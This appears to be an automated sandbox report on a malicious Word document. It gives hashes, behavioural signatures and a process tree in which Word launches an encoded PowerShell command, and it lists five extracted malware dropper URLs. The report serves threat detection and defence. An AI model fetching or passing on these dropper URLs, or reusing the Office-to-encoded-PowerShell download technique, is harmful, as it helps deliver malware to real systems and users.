Analysis

  • max time kernel
    118s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240611-en, locale:en-us, os:windows7-x64, system
  • submitted
    25-06-2024 19:43

General

  • Target
    0f4b4224e8cf4f1d17e9ddbbc1d2754f_JaffaCakes118.doc
  • Size
    249KB
  • MD5
    0f4b4224e8cf4f1d17e9ddbbc1d2754f
  • SHA1
    8af07c2af3c4777dd4778ef05caa97c2c063f158
  • SHA256
    1a931c6fb2d0fc289a63c049465e1d54be273981aa9571f995aa87fdd13b0b4f
  • SHA512
    94633ab394e3482b1f88adb6ac1e81699526e6d5ed168aa3bce70e3511dfaf597524c241a47c89fadd817a2138f6d4ebeac9f6acc75cbcfb30a9259cd57cf44c
  • SSDEEP
    6144:P77HUUUUUUUUUUUUUUUUUUUT52V6BWLshhh+afk0SIhIvg+ZGPr:P77HUUUUUUUUUUUUUUUUUUUTChLsh7+0

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    • exe.dropper: http://decospirit.com/D5ubP/
    • exe.dropper: http://databacknow.com/logos/xsDJR/
    • exe.dropper: http://thienuy.com/wp-snapshots/0kmQW/
    • exe.dropper: http://deparcel.com/catalog/Mg/
    • exe.dropper: http://deselbybowen.com/LAO3/

Signatures

  • Blocklisted process makes network request 7 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0f4b4224e8cf4f1d17e9ddbbc1d2754f_JaffaCakes118.doc"
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2948
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      PID:1188
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -nop -enc 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
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:264

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm (Filesize 20KB)
      MD5 f31cd3bebc8c8c5b22e989da810bdf62
      SHA1 d97b94365f6ca4f9d598fd2d10a9379924fb94e1
      SHA256 9b918f125912e178f6312f61e26064a72108e8bb585d160a33dc9f97460df20d
      SHA512 08b889c1e34916833203203d998f9dff2ed28533751f34d7c21381b8e61ff33eacd57be982da7e6eafd0f77edbfd279b56501e03b9a2a4575af9e2a9e4245dcf
    • memory/264-71-0x000000001B370000-0x000000001B652000-memory.dmp (Filesize 2.9MB)
    • memory/264-72-0x0000000001F40000-0x0000000001F48000-memory.dmp (Filesize 32KB)
    • memory/2948-16-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-65-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-62-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-7-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-64-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-63-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-61-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-50-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-36-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-29-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-21-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-20-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-19-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-18-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-17-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-0-0x000000002F9D1000-0x000000002F9D2000-memory.dmp (Filesize 4KB)
    • memory/2948-22-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-15-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-8-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-2-0x0000000070B0D000-0x0000000070B18000-memory.dmp (Filesize 44KB)
    • memory/2948-14-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-13-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-12-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-11-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-60-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-57-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-55-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-43-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-6-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-10-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-9-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-78-0x0000000070B0D000-0x0000000070B18000-memory.dmp (Filesize 44KB)
    • memory/2948-79-0x0000000000630000-0x0000000000730000-memory.dmp (Filesize 1024KB)
    • memory/2948-1-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize 64KB)
    • memory/2948-97-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize 64KB)
    • memory/2948-98-0x0000000070B0D000-0x0000000070B18000-memory.dmp (Filesize 44KB)